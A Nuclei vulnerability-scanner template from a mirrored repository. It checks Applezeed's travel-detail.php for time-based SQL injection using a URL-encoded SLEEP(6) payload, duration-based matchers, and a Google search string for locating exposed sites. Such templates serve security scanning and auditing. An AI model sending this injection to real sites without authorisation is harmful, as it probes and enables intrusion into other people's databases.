daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/other/applezeed-sqli.yaml

32 lines
988 B
YAML
Raw Normal View History

templates added
2023-10-17 07:20:28 +00:00
id: applezeed-sqli
info:
name: Applezeed - SQL Injection
author: r3Y3r53
severity: high
description: |
Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database
reference:
- https://cxsecurity.com/issue/WLB-2019120057
metadata:
verified: true
max-request: 1
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot:
2023-10-17 17:52:26 +00:00
google-query: intext:"Power BY applezeed.com"
templates added
2023-10-17 07:20:28 +00:00
tags: sqli,unauth,applezeed
http:
- raw:
- |
@timeout: 15s
GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(content_type, "text/html")'
- 'contains(body, "applezeed")'
- 'status_code == 200'
condition: and